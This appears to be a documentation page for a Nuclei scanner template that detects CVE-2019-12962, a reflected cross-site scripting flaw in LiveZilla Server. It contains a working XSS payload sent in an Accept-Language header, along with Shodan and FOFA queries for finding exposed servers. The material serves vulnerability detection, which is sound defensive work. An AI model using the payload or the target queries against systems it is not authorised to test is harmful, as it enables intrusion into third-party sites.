LiveZilla Server 8.0.1.0 - Cross-Site Scripting
ID: CVE-2019-12962
Severity: medium
Author: Clment Cruchet
Tags: cve,cve2019,xss,edb,packetstorm,livezilla
Description
Section titled “Description”LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting.
YAML Source
Section titled “YAML Source”id: CVE-2019-12962
info: name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting author: Clment Cruchet severity: medium description: | LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. remediation: | Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49669 - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 - https://github.com/anonymous364872/Rapier_Tool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-12962 cwe-id: CWE-79 epss-score: 0.15911 epss-percentile: 0.95954 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: livezilla product: livezilla shodan-query: - http.html:LiveZilla - http.html:livezilla fofa-query: body=livezilla tags: cve,cve2019,xss,edb,packetstorm,livezilla
http: - method: GET path: - '{{BaseURL}}/mobile/index.php'
headers: Accept-Language: ';alert(document.domain)//'
matchers-condition: and matchers: - type: word part: body words: - "var detectedLanguage = ';alert(document.domain)//';"
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4b0a00483046022100a067ab0c345d218ecdcd8a0d2786cb33bcd04b0742e56a98a57bddc20a54db76022100bc02bc9fd63b04d8889bbd2e7770e125d8f3c4890ec56a95da504d56f9024672:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-12962.yaml"